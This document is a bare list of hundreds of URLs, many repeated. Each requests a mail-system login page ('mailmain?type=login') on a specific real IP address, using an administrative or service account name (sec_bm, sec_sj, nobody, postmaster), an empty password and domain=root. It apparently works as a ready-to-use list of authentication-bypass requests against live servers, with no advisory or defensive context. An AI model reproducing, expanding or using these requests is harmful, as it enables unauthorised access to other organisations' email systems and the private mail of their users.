http://103.4.58.71/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://122.226.156.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://122.226.156.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.117.43.134/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.117.43.134/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.187.225.216/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.187.225.216/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.187.225.216/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.207.128.53/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.207.128.53/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.207.128.53/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.108.92.181/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://59.108.92.181/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://116.252.221.110/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://101.231.207.29/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://101.231.207.29/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://101.231.207.29/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.89.67.219/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.89.67.219/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.89.67.219/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.200.234.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.200.234.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://59.151.39.54/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.42.107.149/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.144.130.184/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://119.147.24.210/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://119.147.24.210/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.239.205.129/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.206.233.148/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://219.143.34.163/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.143.34.163/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.103.100.249/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.103.235.165/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.103.235.165/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://123.127.94.203/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.127.94.203/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://223.72.166.178/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.255.255.98/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.49.85.100/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.42.107.149/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://220.250.22.166/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://220.250.22.166/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.88.37.23/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.205.74.197/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.74.197/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://1.202.238.201/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://1.202.238.201/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://1.202.238.201/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://111.1.67.216/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.207.46.68/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.207.46.68/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.144.222.162/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.144.222.162/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.11.196.145/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.11.196.145/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.11.196.145/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.207.128.53/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.207.128.53/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.207.128.53/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://112.5.172.28/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.108.58.99/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.13.199.200/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.13.199.200/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.143.34.163/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.143.34.163/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.187.225.216/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.187.225.216/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.187.225.216/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.13.199.200/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.13.199.200/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.104.195.196/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.104.195.196/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://123.127.94.203/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.127.94.203/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.38/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.38/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.38/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://123.124.245.137/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://183.63.90.178/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://183.63.90.178/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.62.64.186/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://42.159.132.225/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://42.159.132.225/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://42.159.132.225/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.83.245.152/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.83.245.152/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.239.205.129/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://111.3.156.73/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://111.3.156.73/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.215.119.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://42.159.132.225/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://42.159.132.225/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://42.159.132.225/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.144.139.231/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.199.112.6/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.88.37.23/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://60.209.94.94/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.103.234.102/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://112.5.172.28/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.200.234.30/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.200.234.30/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://119.97.235.163/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.39/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.39/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.39/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.25.155.38/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://223.4.94.7/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.88.37.206/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.151.39.54/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.93.44.214/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.93.44.214/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.36/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.36/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.36/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.142.200.23/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://49.5.0.19/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://123.178.189.138/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://115.239.177.6/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.48.85/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.48.85/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.7.246.66/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.7.246.66/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://59.108.58.106/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://59.108.58.106/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.136.251.32/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.136.251.32/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.76.65.145/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.80.204.37/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://117.41.182.92/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://49.5.0.19/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://223.72.166.178/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://202.85.210.134/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://220.231.9.108/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://219.136.251.33/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.217.131/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.157.144.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://122.225.54.86/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://122.225.54.86/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.73.44.121/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.73.44.121/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.73.44.121/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://60.214.209.217/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.7.196.59/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://112.25.179.84/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://112.25.179.84/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.76.65.142/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.143.225.199/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.232.11.207/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.242.141/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.42.107.149/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.226.116/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://114.255.181.71/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.255.181.71/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://210.13.195.126/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://124.205.110.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://123.127.160.103/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://123.127.160.103/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://123.127.160.103/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://117.40.130.53/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://222.186.81.40/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.188.4.129/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://58.213.155.162/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.213.155.162/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.213.155.162/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://59.108.92.181/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://59.108.92.181/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.104.195.196/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.104.195.196/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://182.140.240.11/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://202.104.3.125/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://221.10.90.2/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://59.60.6.227/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.108.253.183/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.180.145.70/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://58.42.242.180/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://210.76.65.142/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://112.95.169.54/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://183.63.187.3/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://61.189.86.4/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.189.86.4/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.65.61.122/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://183.63.80.4/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://183.63.80.4/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://211.147.247.34/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://114.251.192.245/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=postmaster&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://125.46.95.180/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://113.240.230.62/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://61.189.86.4/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://61.189.86.4/mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise http://220.231.9.108/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise http://218.92.205.170/mailmain?type=login&uid=sec_bm&pwd=&domain=root&style=enterprise http://218.92.205.170/mailmain?type=login&uid=nobody&pwd=&domain=root&style=enterprise 